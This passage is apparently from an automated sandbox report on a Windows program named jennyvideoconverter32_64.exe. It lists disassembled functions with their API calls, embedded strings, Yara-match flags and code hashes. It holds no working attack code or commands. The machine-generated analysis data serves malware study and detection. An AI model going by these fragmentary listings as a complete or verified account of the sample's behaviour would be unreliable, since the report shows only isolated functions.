                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CriticalDeleteH_prologSection
                                                                                • String ID:
                                                                                • API String ID: 2456309408-0
                                                                                • Opcode ID: 777bfc9717109429f3884f5568ae730561c2ef80032730d4c0aa96a913c557c3
                                                                                • Instruction ID: 6b4dfc1a3569913e24acbe4b8162ca36a9dd77b9ddff0a7c0859ab473c671503
                                                                                • Opcode Fuzzy Hash: 777bfc9717109429f3884f5568ae730561c2ef80032730d4c0aa96a913c557c3
                                                                                • Instruction Fuzzy Hash: 6401A9718006449BD738AF64E908BAAFBB5FF04704F20495DE84682BA0CBB46D48CF64
                                                                                Function 02D81E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Event$H_prologSleep
                                                                                • String ID:
                                                                                • API String ID: 1765829285-0
                                                                                • Opcode ID: ec3f968e3098b67af8cbd9264077be97a8faef05afa91847f0a1128f06340ada
                                                                                • Instruction ID: 201132100f51793ef996c34dd50acf7bbe236cd6cbd8894ea641a098337a240b
                                                                                • Opcode Fuzzy Hash: ec3f968e3098b67af8cbd9264077be97a8faef05afa91847f0a1128f06340ada
                                                                                • Instruction Fuzzy Hash: B4F09A32A40510EFDB009FA4E889F8DBBB0FF08321F1081A8FA0A8B390C7359C40CB65
                                                                                Function 0040475C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 27memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
                                                                                • HeapFree.KERNEL32(00000000,?), ref: 004047A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Free$HeapVirtual
                                                                                • String ID: r@$r@
                                                                                • API String ID: 3783212868-1712950306
                                                                                • Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                • Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
                                                                                • Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
                                                                                • Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88
                                                                                Function 02D89E88 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmove
                                                                                • String ID: &'
                                                                                • API String ID: 3529519853-655172784
                                                                                • Opcode ID: a8ec218c8a594b5011fd37b4f0966d4d6df3613925d7a3ea852be24f1f620362
                                                                                • Instruction ID: ebc32e56ef3b293fccee4deb559512d721ad046987d5705be0a0299b6ac8276b
                                                                                • Opcode Fuzzy Hash: a8ec218c8a594b5011fd37b4f0966d4d6df3613925d7a3ea852be24f1f620362
                                                                                • Instruction Fuzzy Hash: 4C616A71D00219DFDF25EFA4C990AEDBBB6EF48710F10816AE545AB380D7709E45CBA1
                                                                                Function 00404EBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: Info
                                                                                • String ID: $
                                                                                • API String ID: 1807457897-3032137957
                                                                                • Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                • Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
                                                                                • Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
                                                                                • Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB
                                                                                Function 02D8CBE2 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8CBE7
                                                                                  • Part of subcall function 02D8D1C3: std::exception::exception.LIBCMT ref: 02D8D1F2
                                                                                  • Part of subcall function 02D8D979: __EH_prolog.LIBCMT ref: 02D8D97E
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8D222: __EH_prolog.LIBCMT ref: 02D8D227
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CC24
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D8CC1D
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
                                                                                • API String ID: 1953324306-1943798000
                                                                                • Opcode ID: 40362b45bcb3e364598f763091a67e62ca22500dafb9b1536e8cf3e73c58648c
                                                                                • Instruction ID: 4bbb40e2ac700ad00615342276caf8ec9105e9cb285b707e84a13b712f23b0fd
                                                                                • Opcode Fuzzy Hash: 40362b45bcb3e364598f763091a67e62ca22500dafb9b1536e8cf3e73c58648c
                                                                                • Instruction Fuzzy Hash: D3217E71D05244EBDB14FFE4E964AAEBBB6EF54704F00405DE845A7390DB709E44CB61
                                                                                Function 02D8CCD7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8CCDC
                                                                                  • Part of subcall function 02D8D29A: std::exception::exception.LIBCMT ref: 02D8D2C7
                                                                                  • Part of subcall function 02D8DAB0: __EH_prolog.LIBCMT ref: 02D8DAB5
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                  • Part of subcall function 02D8D2F7: __EH_prolog.LIBCMT ref: 02D8D2FC
                                                                                Strings
                                                                                • C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D8CD19
                                                                                • class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 02D8CD12
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$_mallocstd::exception::exception
                                                                                • String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
                                                                                • API String ID: 1953324306-412195191
                                                                                • Opcode ID: a96880f1a338ea37cd3a2ddf7c82bb9332ac037bbc7b83bf8135f721a18a5800
                                                                                • Instruction ID: 3fdfe5af443461b09868481950cb4b6a5a094e2d148bff47efd3268b1bf1426e
                                                                                • Opcode Fuzzy Hash: a96880f1a338ea37cd3a2ddf7c82bb9332ac037bbc7b83bf8135f721a18a5800
                                                                                • Instruction Fuzzy Hash: 10219E71E00248DBDB18FFE8E464AADBBB6EF54704F04404DE906A7380DB709E44CBA1
                                                                                Function 02D8534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _malloc.LIBCMT ref: 02D8535D
                                                                                  • Part of subcall function 02D92EEC: __FF_MSGBANNER.LIBCMT ref: 02D92F03
                                                                                  • Part of subcall function 02D92EEC: __NMSG_WRITE.LIBCMT ref: 02D92F0A
                                                                                  • Part of subcall function 02D92EEC: RtlAllocateHeap.NTDLL(007A0000,00000000,00000001), ref: 02D92F2F
                                                                                • SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D8536F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocateFolderHeapPathSpecial_malloc
                                                                                • String ID: \save.dat
                                                                                • API String ID: 4128168839-3580179773
                                                                                • Opcode ID: 21402eef1cfd47135c050399f4cf12cc346018416f013787a0a3b42a72da6656
                                                                                • Instruction ID: f5ae9683544cb5edb9892ce20059b89933d2b7106a0167347bc04974e53f6597
                                                                                • Opcode Fuzzy Hash: 21402eef1cfd47135c050399f4cf12cc346018416f013787a0a3b42a72da6656
                                                                                • Instruction Fuzzy Hash: 25113A729042447BDF22AE659C84E6FFFABDF83650B5501A9F88567302D6A20D02C6A0
                                                                                Function 00403351 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe,00000104,?,00000000,?,?,?,?,00402DEE), ref: 00403374
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: FileModuleName
                                                                                • String ID: C:\Users\user\AppData\Local\Jenny Video Converter\jennyvideoconverter32_64.exe$h6z
                                                                                • API String ID: 514040917-1070601641
                                                                                • Opcode ID: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                                                • Instruction ID: 9914cd9322f57819df26321eb5c0d5781e1a9b7dbf92489965342876274e8e32
                                                                                • Opcode Fuzzy Hash: 4b8fbbe1edf07751b100c16af9a753027d93dae450da557b14ba1428fad57fc3
                                                                                • Instruction Fuzzy Hash: 7E113DB2900218BFC711EF99D9C5C9B7BACEB44358B0000BAF905A7281DA759E558BA9
                                                                                Function 02D83965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8396A
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D839C1
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D8A551: __EH_prolog.LIBCMT ref: 02D8A556
                                                                                  • Part of subcall function 02D8A551: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D8A565
                                                                                  • Part of subcall function 02D8A551: __CxxThrowException@8.LIBCMT ref: 02D8A584
                                                                                Strings
                                                                                • Day of month is not valid for year, xrefs: 02D839AC
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month is not valid for year
                                                                                • API String ID: 1404951899-1521898139
                                                                                • Opcode ID: d21960b00a133dbd2354c170308b23d089c05357df67699416f48b4a0f35b110
                                                                                • Instruction ID: 6c6b6eb2f9a511a6709740a9a656e713db51982875c22e79728d7a520bc97b58
                                                                                • Opcode Fuzzy Hash: d21960b00a133dbd2354c170308b23d089c05357df67699416f48b4a0f35b110
                                                                                • Instruction Fuzzy Hash: 1D01D47A810209AADF04FFA8D805AEEB7B9FF14710F40805BEC0493340EB748E55CBA5
                                                                                Function 02D8B033 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • std::exception::exception.LIBCMT ref: 02D8FA4A
                                                                                • __CxxThrowException@8.LIBCMT ref: 02D8FA5F
                                                                                  • Part of subcall function 02D93A8F: _malloc.LIBCMT ref: 02D93AA7
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Exception@8Throw_mallocstd::exception::exception
                                                                                • String ID: bad allocation
                                                                                • API String ID: 4063778783-2104205924
                                                                                • Opcode ID: ebec02a9bd43b2863076fa23cba10cbfe36f674d0877b2f7260099dc0e9e7f48
                                                                                • Instruction ID: 6f4bb5df39713363b307101712f447c1d16319ac84fd2fad432ae016c6ea915e
                                                                                • Opcode Fuzzy Hash: ebec02a9bd43b2863076fa23cba10cbfe36f674d0877b2f7260099dc0e9e7f48
                                                                                • Instruction Fuzzy Hash: C1F0277060430DAADF04FFA888159AFB3ECEB04715F90056AF921E2780EB70EE04C5A4
                                                                                Function 02D83C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83C1B
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D83C30
                                                                                  • Part of subcall function 02D923F7: std::exception::exception.LIBCMT ref: 02D92401
                                                                                  • Part of subcall function 02D8A58A: __EH_prolog.LIBCMT ref: 02D8A58F
                                                                                  • Part of subcall function 02D8A58A: __CxxThrowException@8.LIBCMT ref: 02D8A5B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 3eff11a20fb6da70aa7fe43f6725f3cc1ae63315a9ac5098a0cdaae3676f1e40
                                                                                • Instruction ID: fd16c71df20048ac614926aab547dbfe3867704e658e0cf2921670ad4d361264
                                                                                • Opcode Fuzzy Hash: 3eff11a20fb6da70aa7fe43f6725f3cc1ae63315a9ac5098a0cdaae3676f1e40
                                                                                • Instruction Fuzzy Hash: 02F0A072D005049BCB09EF58E450AEAB776EF51311F5040AEEE095B350CB729E4ACAA1
                                                                                Function 02D838CD Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D838D2
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D838F1
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Year is out of valid range: 1400..10000, xrefs: 02D838E0
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Year is out of valid range: 1400..10000
                                                                                • API String ID: 3258419250-2344417016
                                                                                • Opcode ID: 82c55aa4ff38a1406a8fcc2f0082da9955c60f9c00a8d06cf6084662b3533ce8
                                                                                • Instruction ID: 5c61df12f332240c538d2136f4b13a34891b22d4171760478758ce6c8c789c94
                                                                                • Opcode Fuzzy Hash: 82c55aa4ff38a1406a8fcc2f0082da9955c60f9c00a8d06cf6084662b3533ce8
                                                                                • Instruction Fuzzy Hash: 06E092B2E401049BE714FB989821BDDB775EB48720F40044AD841A7780DAB51D44CBA5
                                                                                Function 02D83881 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83886
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D838A5
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Day of month value is out of range 1..31, xrefs: 02D83894
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Day of month value is out of range 1..31
                                                                                • API String ID: 3258419250-1361117730
                                                                                • Opcode ID: 972f790e32c021e540a744be4d539c18a75b9a8e54e334ddce81bf9779ddeedc
                                                                                • Instruction ID: c0195a3fcaf1e1cbfbe6da634444ebe4ee0391f1874366f92c99306d4575a5ab
                                                                                • Opcode Fuzzy Hash: 972f790e32c021e540a744be4d539c18a75b9a8e54e334ddce81bf9779ddeedc
                                                                                • Instruction Fuzzy Hash: B3E0D872E001049BE714BF98D821FDDB775EF48720F40004AD801B3780DAB51D448BE5
                                                                                Function 02D83919 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D8391E
                                                                                • std::runtime_error::runtime_error.LIBCPMT ref: 02D8393D
                                                                                  • Part of subcall function 02D81410: std::exception::exception.LIBCMT ref: 02D81428
                                                                                  • Part of subcall function 02D888BF: _memmove.LIBCMT ref: 02D888DF
                                                                                Strings
                                                                                • Month number is out of range 1..12, xrefs: 02D8392C
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog_memmovestd::exception::exceptionstd::runtime_error::runtime_error
                                                                                • String ID: Month number is out of range 1..12
                                                                                • API String ID: 3258419250-4198407886
                                                                                • Opcode ID: fd93ada1535330a85f41e71d73f47934bd5418a8b9ba24e1ad6068f9f0a8ddea
                                                                                • Instruction ID: 609d990356f7f324218fd67989a519a37636f8054f12f4c9b35c14dc68047e8a
                                                                                • Opcode Fuzzy Hash: fd93ada1535330a85f41e71d73f47934bd5418a8b9ba24e1ad6068f9f0a8ddea
                                                                                • Instruction Fuzzy Hash: 68E0D872E001089BE714BF989821FDDB775EF08720F50044AD801A3780DAB51D448BE5
                                                                                Function 02D819C2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • TlsAlloc.KERNEL32 ref: 02D819CC
                                                                                • GetLastError.KERNEL32 ref: 02D819D9
                                                                                  • Part of subcall function 02D81712: __EH_prolog.LIBCMT ref: 02D81717
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocErrorH_prologLast
                                                                                • String ID: tss
                                                                                • API String ID: 249634027-1638339373
                                                                                • Opcode ID: 7605fe46fbbc93d4ac29a6b6f606849a51801ec6434299f61335b2c125771d9b
                                                                                • Instruction ID: d09e798584c2abe8282dcdbcb90d1c457933071a24a62dbaab2e682ef17878f3
                                                                                • Opcode Fuzzy Hash: 7605fe46fbbc93d4ac29a6b6f606849a51801ec6434299f61335b2c125771d9b
                                                                                • Instruction Fuzzy Hash: B3E04F329042109B87007A78E80948FBBA4DA41231F108B6AECBD833D0EA308D158ADA
                                                                                Function 02D83BD3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __EH_prolog.LIBCMT ref: 02D83BD8
                                                                                • std::bad_exception::bad_exception.LIBCMT ref: 02D83BED
                                                                                  • Part of subcall function 02D923F7: std::exception::exception.LIBCMT ref: 02D92401
                                                                                  • Part of subcall function 02D8A58A: __EH_prolog.LIBCMT ref: 02D8A58F
                                                                                  • Part of subcall function 02D8A58A: __CxxThrowException@8.LIBCMT ref: 02D8A5B8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3337258779.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D81000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_2d81000_jennyvideoconverter32_64.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
                                                                                • String ID: bad cast
                                                                                • API String ID: 1300498068-3145022300
                                                                                • Opcode ID: 9f3706ee289fc99cf911a59173c83e0ec8130b76f430a591dcbf296e60d9670f
                                                                                • Instruction ID: 38f4798b63a0a84cdb3afe6f71d9b9867d0bcfb1d316733a1727026ba133a4e4
                                                                                • Opcode Fuzzy Hash: 9f3706ee289fc99cf911a59173c83e0ec8130b76f430a591dcbf296e60d9670f
                                                                                • Instruction Fuzzy Hash: E9E01A719001089BD704EF54E561BA9B771EB54301F4080ADED0657790CB359D56CEA5
                                                                                Function 0040446C Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 00404494
                                                                                • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044C8
                                                                                • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044E2
                                                                                • HeapFree.KERNEL32(00000000,?,?,00000000,00404234,?,?,?,00000100,?,00000000), ref: 004044F9
                                                                                Memory Dump Source
                                                                                • Source File: 00000003.00000002.3335479194.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000003.00000002.3335479194.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_3_2_400000_jennyvideoconverter32_64.jbxd
                                                                                Similarity
                                                                                • API ID: AllocHeap$FreeVirtual
                                                                                • String ID:
                                                                                • API String ID: 3499195154-0
                                                                                • Opcode ID: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                • Instruction ID: 6532d2b8740b88ca5c68c93f46193dcc45771cdeba7f909f778517217a69801f
                                                                                • Opcode Fuzzy Hash: 03264f3b7f6a3c24648121467edc173d78a87d9b85cb2d8b679f40e74ce8d20c
                                                                                • Instruction Fuzzy Hash: 02113670200301AFC731CF29EE45A627BB5FB847207104A3AF252E65F0D775A866EF19